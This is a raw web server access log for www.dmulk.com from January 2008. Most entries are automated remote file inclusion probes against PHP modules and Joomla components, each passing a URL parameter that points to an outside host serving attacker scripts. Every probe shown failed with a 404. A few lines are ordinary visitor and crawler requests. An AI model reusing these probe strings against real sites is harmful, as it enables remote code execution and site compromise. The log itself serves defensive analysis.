125.251.147.130 - - [18/Jan/2008:05:02:17 -0800] "GET /logs/access_071228.log/modules/My_eGallery/index.php?basepath=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.119.183.5 - - [18/Jan/2008:05:02:26 -0800] "GET /logs/access.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.lammer.altervista.org/php5/com.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.119.183.5 - - [18/Jan/2008:05:02:27 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.lammer.altervista.org/php5/com.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.119.183.5 - - [18/Jan/2008:05:02:27 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.lammer.altervista.org/php5/com.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
125.251.147.130 - - [18/Jan/2008:05:02:44 -0800] "GET /logs/access_071228.log/modules/My_eGallery/index.php?basepath=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.119.183.5 - - [18/Jan/2008:05:04:30 -0800] "GET /logs/access_071220.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.lammer.altervista.org/php5/com.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.119.183.5 - - [18/Jan/2008:05:04:30 -0800] "GET /logs/access_071216.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.lammer.altervista.org/php5/com.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.119.183.5 - - [18/Jan/2008:05:04:30 -0800] "GET /logs/access_071228.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.lammer.altervista.org/php5/com.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.199.19 - - [18/Jan/2008:05:04:52 -0800] "GET /logs/access.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.lammer.altervista.org/php5/com.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.199.19 - - [18/Jan/2008:05:04:53 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.lammer.altervista.org/php5/com.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.199.19 - - [18/Jan/2008:05:04:53 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.lammer.altervista.org/php5/com.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.119.183.5 - - [18/Jan/2008:05:05:02 -0800] "GET /logs/access_071221.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.lammer.altervista.org/php5/com.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.13.229.88 - - [18/Jan/2008:05:05:02 -0800] "GET /oneadmin/adminfoot.php?path[docroot]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.117.17.226 - - [18/Jan/2008:05:05:14 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
87.117.17.226 - - [18/Jan/2008:05:05:15 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
66.230.199.19 - - [18/Jan/2008:05:06:48 -0800] "GET /logs/access_071220.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.lammer.altervista.org/php5/com.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.199.19 - - [18/Jan/2008:05:06:48 -0800] "GET /logs/access_071216.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.lammer.altervista.org/php5/com.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.199.19 - - [18/Jan/2008:05:06:49 -0800] "GET /logs/access_071228.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.lammer.altervista.org/php5/com.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.13.170.12 - - [18/Jan/2008:05:06:57 -0800] "GET / HTTP/1.0" 200 2946 "http://www.google.it/search?num=100&hl=it&safe=off&q=intitle%3A%22index+of%22+%22parent+directory%22+mobileoffice&btnG=Cerca&meta=" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
62.13.170.12 - - [18/Jan/2008:05:06:59 -0800] "GET /favicon.ico HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
62.13.170.12 - - [18/Jan/2008:05:07:02 -0800] "GET /mobileoffice/ HTTP/1.0" 200 5008 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
66.230.199.19 - - [18/Jan/2008:05:07:18 -0800] "GET /logs/access_071221.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.lammer.altervista.org/php5/com.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.119.183.5 - - [18/Jan/2008:05:07:58 -0800] "GET /logs/access_071212.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.lammer.altervista.org/php5/com.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.126 - - [18/Jan/2008:05:08:11 -0800] "GET /mobileoffice/?S=A HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.119.183.5 - - [18/Jan/2008:05:10:41 -0800] "GET /logs/access_071116.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.lammer.altervista.org/php5/com.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.119.183.5 - - [18/Jan/2008:05:11:19 -0800] "GET /logs/access_071218.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.lammer.altervista.org/php5/com.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.199.19 - - [18/Jan/2008:05:11:20 -0800] "GET /logs/access_071212.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.lammer.altervista.org/php5/com.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.230.146 - - [18/Jan/2008:05:12:45 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.230.146 - - [18/Jan/2008:05:12:45 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.71.171.52 - - [18/Jan/2008:05:12:45 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.71.171.52 - - [18/Jan/2008:05:12:45 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.230.146 - - [18/Jan/2008:05:12:46 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.230.146 - - [18/Jan/2008:05:12:46 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.230.146 - - [18/Jan/2008:05:12:49 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.230.146 - - [18/Jan/2008:05:12:49 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.230.146 - - [18/Jan/2008:05:12:49 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.230.146 - - [18/Jan/2008:05:12:49 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.230.146 - - [18/Jan/2008:05:12:49 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.230.146 - - [18/Jan/2008:05:12:49 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.230.146 - - [18/Jan/2008:05:12:50 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.230.146 - - [18/Jan/2008:05:12:50 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.230.146 - - [18/Jan/2008:05:12:50 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.230.146 - - [18/Jan/2008:05:12:51 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.230.146 - - [18/Jan/2008:05:12:53 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.230.146 - - [18/Jan/2008:05:12:53 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.230.146 - - [18/Jan/2008:05:12:56 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.230.146 - - [18/Jan/2008:05:12:56 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.230.146 - - [18/Jan/2008:05:12:57 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.230.146 - - [18/Jan/2008:05:12:57 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.199.19 - - [18/Jan/2008:05:14:00 -0800] "GET /logs/access_071116.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.lammer.altervista.org/php5/com.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.199.19 - - [18/Jan/2008:05:14:47 -0800] "GET /logs/access_071218.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.lammer.altervista.org/php5/com.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.119.183.5 - - [18/Jan/2008:05:19:30 -0800] "GET /logs/access_071203.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.lammer.altervista.org/php5/com.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.233.19.105 - - [18/Jan/2008:05:20:11 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
211.233.19.105 - - [18/Jan/2008:05:20:11 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
211.233.19.105 - - [18/Jan/2008:05:20:11 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
211.233.19.105 - - [18/Jan/2008:05:20:11 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
129.81.82.103 - - [18/Jan/2008:05:21:11 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
129.81.82.103 - - [18/Jan/2008:05:21:11 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
129.81.82.103 - - [18/Jan/2008:05:21:12 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
129.81.82.103 - - [18/Jan/2008:05:21:12 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
212.227.101.9 - - [18/Jan/2008:05:21:51 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
212.227.101.9 - - [18/Jan/2008:05:21:51 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
212.227.101.9 - - [18/Jan/2008:05:21:51 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
212.227.101.9 - - [18/Jan/2008:05:21:51 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
74.6.22.126 - - [18/Jan/2008:05:23:45 -0800] "GET /funny/?S=A HTTP/1.0" 200 796 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.230.199.19 - - [18/Jan/2008:05:24:48 -0800] "GET /logs/access_071203.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.lammer.altervista.org/php5/com.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.26.236 - - [18/Jan/2008:05:25:26 -0800] "GET /megumi/Necklace/?M=A HTTP/1.0" 200 4307 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
167.127.179.10 - - [18/Jan/2008:05:25:59 -0800] "GET /bikes/dteel/15JAN08/20080115_0002M.JPG HTTP/1.1" 200 67485 "http://www.st-owners.com/forums/showthread.php?t=30553&page=7" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
74.4.20.46 - - [18/Jan/2008:05:26:25 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.strider.we.bs/scan/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.18.66 - - [18/Jan/2008:05:26:36 -0800] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://www.jwayauctions.com//logo/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [18/Jan/2008:05:26:36 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.jwayauctions.com//logo/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [18/Jan/2008:05:26:36 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.jwayauctions.com//logo/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.4.20.46 - - [18/Jan/2008:05:26:44 -0800] "GET /logs/access_071109.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.strider.we.bs/scan/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.4.20.46 - - [18/Jan/2008:05:26:44 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.strider.we.bs/scan/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.18.66 - - [18/Jan/2008:05:26:55 -0800] "GET /logs/access_071228.log//skin/zero_vote/ask_password.php?dir=http://www.jwayauctions.com//logo/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [18/Jan/2008:05:28:19 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.jwayauctions.com//logo/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.119.183.5 - - [18/Jan/2008:05:31:21 -0800] "GET /logs/access_071224.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.lammer.altervista.org/php5/com.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.119.183.5 - - [18/Jan/2008:05:33:56 -0800] "GET /logs/access_080101.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.lammer.altervista.org/php5/com.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
123.214.171.106 - - [18/Jan/2008:05:35:16 -0800] "GET /logs/access_071214.log/skin/zero_vote/ask_password.php?dir=http://www.nzvikings.dk/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
123.214.171.106 - - [18/Jan/2008:05:35:17 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://www.nzvikings.dk/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
123.214.171.106 - - [18/Jan/2008:05:35:17 -0800] "GET /logs/skin/zero_vote/ask_password.php?dir=http://www.nzvikings.dk/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.27.80 - - [18/Jan/2008:05:37:03 -0800] "GET /logs/access_070825.log HTTP/1.0" 200 82596 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
123.214.171.106 - - [18/Jan/2008:05:37:26 -0800] "GET /logs/access_071214.log/skin/zero_vote/ask_password.php?dir=http://www.nzvikings.dk/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
123.214.171.106 - - [18/Jan/2008:05:37:26 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://www.nzvikings.dk/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
123.214.171.106 - - [18/Jan/2008:05:37:27 -0800] "GET /logs/skin/zero_vote/ask_password.php?dir=http://www.nzvikings.dk/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.230.199.19 - - [18/Jan/2008:05:40:37 -0800] "GET /logs/access_071224.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.lammer.altervista.org/php5/com.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.48.124 - - [18/Jan/2008:05:41:52 -0800] "GET //skin/zero_vote/error.php?dir=http://geocities.com/lia/bot/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.48.124 - - [18/Jan/2008:05:42:56 -0800] "GET //skin/zero_vote/error.php?dir=http://geocities.com/lia/bot/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.199.19 - - [18/Jan/2008:05:44:55 -0800] "GET /logs/access_080101.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.lammer.altervista.org/php5/com.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.194.74.238 - - [18/Jan/2008:05:49:48 -0800] "GET /index.php?option=com_jwmmxtd&task=cat_view&gid=&mosConfig_absolute_path=http://nybap.org/editor/flower.gif??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
82.194.74.238 - - [18/Jan/2008:05:49:48 -0800] "GET /logs/index.php?option=com_jwmmxtd&task=cat_view&gid=&mosConfig_absolute_path=http://nybap.org/editor/flower.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
206.221.184.180 - - [18/Jan/2008:05:49:55 -0800] "GET /logs/access_071214.log/skin/zero_vote/ask_password.php?dir=http://www.nzvikings.dk/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.221.184.180 - - [18/Jan/2008:05:49:55 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://www.nzvikings.dk/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.221.184.180 - - [18/Jan/2008:05:49:55 -0800] "GET /logs/skin/zero_vote/ask_password.php?dir=http://www.nzvikings.dk/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.109.165.93 - - [18/Jan/2008:05:50:01 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.45.230.146 - - [18/Jan/2008:05:51:33 -0800] "GET /logs/access_071224.log/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.230.146 - - [18/Jan/2008:05:51:33 -0800] "GET /administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.230.146 - - [18/Jan/2008:05:51:33 -0800] "GET /logs/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.126 - - [18/Jan/2008:05:53:02 -0800] "GET /funny/Mencanmultitask.asx HTTP/1.0" 200 817843 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.21.98.67 - - [18/Jan/2008:05:57:14 -0800] "GET /!scanhttp://mrpifpaf.com/_vti_var/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.26.118 - - [18/Jan/2008:05:58:31 -0800] "GET /funny/ HTTP/1.0" 200 796 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
86.109.165.93 - - [18/Jan/2008:06:03:20 -0800] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
86.109.165.93 - - [18/Jan/2008:06:03:20 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.246.48.124 - - [18/Jan/2008:06:04:36 -0800] "GET /logs/access_071229.log//skin/zero_vote/error.php?dir=http://geocities.com/lia/bot/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.48.124 - - [18/Jan/2008:06:04:38 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://geocities.com/lia/bot/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.109.165.93 - - [18/Jan/2008:06:05:02 -0800] "GET /logs/access_071228.log//skin/zero_vote/ask_password.php?dir=http://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
